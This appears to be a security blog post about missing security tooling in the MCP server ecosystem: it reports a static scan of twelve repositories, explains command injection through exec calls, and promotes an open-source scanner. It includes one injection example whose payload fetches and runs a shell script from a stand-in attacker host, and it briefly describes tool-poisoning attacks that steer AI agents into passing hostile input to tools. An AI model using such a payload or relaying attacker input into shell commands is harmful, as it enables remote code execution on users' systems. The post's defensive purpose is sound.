When npm audit was introduced in 2018, it did something deceptively simple: it made security a default part of the developer workflow. You run npm install, you get a vulnerability report. Not because you remembered to check — because the tooling assumed you should always know.
The MCP ecosystem has no equivalent. And that gap is becoming a serious problem.
The Baseline That npm Built
The Node.js ecosystem spent years building a security infrastructure that developers now take for granted:
-
npm audit— vulnerability scanning on every install - Snyk — static analysis, dependency scanning, PR checks
- Dependabot — automated PRs to update vulnerable dependencies
- GitHub's dependency graph — passive vulnerability monitoring
- ESLint security plugins — lint-time detection of dangerous patterns
None of this happened overnight. It accumulated from repeated incidents: the event-stream supply chain attack, the left-pad incident, endless credential leaks from hardcoded secrets. The ecosystem got hurt, then built the tooling to stop getting hurt the same way.
MCP is now at the stage npm was in 2015. The incidents are starting. The tooling doesn't exist yet.
What the Numbers Actually Show
We recently ran static security analysis across 12 popular, public MCP server repositories — including Anthropic's official reference servers, database connectors, browser automation tools, and search integrations.
The results:
| Metric | Value |
|---|---|
| Repositories scanned | 12 |
| Source files analyzed | 1,130 |
| Repos with at least one finding | 12 (100%) |
| Total findings | 58 |
| Critical findings | 12 |
| High findings | 17 |
| Command injection patterns | 46 |
| Hardcoded credentials (production code) | 7 |
| Repos with security scanning in CI | 0 |
The last row is the one that matters most. Not a single repository had automated security scanning in its CI pipeline. These aren't abandoned projects — they're actively maintained MCP servers that thousands of developers are configuring Claude Desktop, Cursor, and other AI clients to use.
Command Injection Is the #1 MCP CVE Pattern
Of the 30+ CVEs filed against MCP-related code in January–February 2026, 43% involve command injection.
This is not surprising when you look at how MCP servers are typically built. Developers reach for child_process.exec() to shell out to system tools. It's fast, familiar, and works fine when you control the inputs.
But MCP tools don't control their inputs. AI agents do. And AI agents receive their inputs from users — or other agents.
Across our 12 repositories, we found:
-
29
child_processimports withoutexecFile— usingspawn()orexec()instead of the saferexecFile(), which prevents shell injection by not invoking a shell at all -
5 direct
exec()calls — shell command execution without sanitization -
3 template literal
exec()calls — string interpolation directly into shell commands -
2
subprocess.run(shell=True)calls — Python's equivalent of unsanitized shell execution
The template literal pattern is worth dwelling on:
exec(`git commit -m "${commitMsg}"`);
// If commitMsg is: "; curl attacker.com/shell.sh | bash #"
// That runs too.
This isn't exotic. This is the kind of thing that gets caught on day one in a Node.js codebase with eslint-plugin-security configured. In MCP servers, nothing is catching it.
The Attack Chain Is Unusually Short
In a traditional web application, exploiting a command injection vulnerability requires getting attacker-controlled input into a specific function, often through multiple layers of validation and sanitization.
In an MCP server, the attack chain is:
User prompt → AI agent → MCP tool parameter → shell command
That's four hops from user input to code execution. In many MCP servers, there's no sanitization at any of those hops. The AI agent passes the parameter as-is. The MCP tool constructs a shell command with it.
Research published alongside the OWASP Agentic AI Top 10 (March 2026) found that more capable AI models are more vulnerable to tool poisoning attacks — 72.8% success rate against o1-mini — because they follow instructions more faithfully. The better the AI, the more reliably it delivers attacker-controlled input to MCP tools.
What a Security Baseline Would Actually Look Like
The npm ecosystem didn't solve security with a single tool. It built a stack of lightweight interventions that collectively make it hard to accidentally ship a vulnerable package.
For MCP, the equivalent stack would look something like:
1. Lint-time: Flag dangerous patterns before commit
-
child_process.exec()with non-literal arguments -
subprocess.run(shell=True)with variable inputs - Template literal shell commands
- Hardcoded secrets matching common API key patterns
2. CI-time: Run a scanner on every PR
- Exit code 1 on high findings, exit code 2 on critical
- JSON output for integration with existing security dashboards
- Rules specific to MCP attack patterns, not just generic Node.js vulnerabilities
3. Schema validation: Define what your tools accept
- Strict JSON Schema for tool parameters (no freeform string blobs)
- Enum constraints for values that should be bounded
- Length limits on anything that gets interpolated into commands
4. execFile instead of exec
- This one is mechanical.
execFiledoesn't invoke a shell. It passes arguments as an array. -
exec('git commit -m ' + msg)→execFile('git', ['commit', '-m', msg]) - The second form is injection-proof at the API level.
None of these are novel security ideas. All of them exist in the broader Node.js and Python ecosystems. None of them have been assembled into a form that's easy for MCP server developers to adopt.
The Community Norm Gap
There's a subtler problem beyond tooling: security scanning isn't yet a community norm in the MCP ecosystem.
When you open a pull request on a popular npm package, you expect that CI runs. You expect linting. You often expect npm audit or Snyk. Reviewers will reject PRs that introduce obvious security regressions.
In MCP server repositories, these expectations haven't formed yet. Developers are focused on functionality — getting tools to work with Claude, exposing APIs, handling edge cases in the protocol. Security scanning feels like extra overhead for a project that's still finding its feet.
This is exactly the window where bad habits solidify. The repositories being written now will be the reference implementations that new MCP developers clone and copy from in six months.
We Built a Start
We're not trying to solve all of this at once. But we ran the analysis, found the patterns, and open-sourced the scanner:
npx @piiiico/agent-audit --auto
This scans your currently configured MCP servers — whatever's in your Claude Desktop, Cursor, or other MCP client config — and reports findings by severity. It runs in about 10 seconds. It exits with a non-zero code if it finds high or critical issues, so it works in CI.
# Add to your CI pipeline:
npx @piiiico/agent-audit --auto --json --min-severity high
# Exit code 0: nothing critical found
# Exit code 1: high severity findings
# Exit code 2: critical findings
The rules are focused on MCP-specific patterns: command injection, hardcoded credentials, dangerous exec patterns. Not a generic security scanner with 500 rules — a targeted tool for the specific failure modes that are showing up in MCP CVEs.
GitHub: github.com/piiiico/agent-audit
The npm ecosystem's security infrastructure took years to build. MCP doesn't have years — the protocol is already in production, the CVEs are already being filed, and the servers being written today will be the foundations that get built on.
If you're maintaining an MCP server, scan it. Add the CI step. Switch exec to execFile. These are small interventions. The window where small interventions matter is right now.
Top comments (0)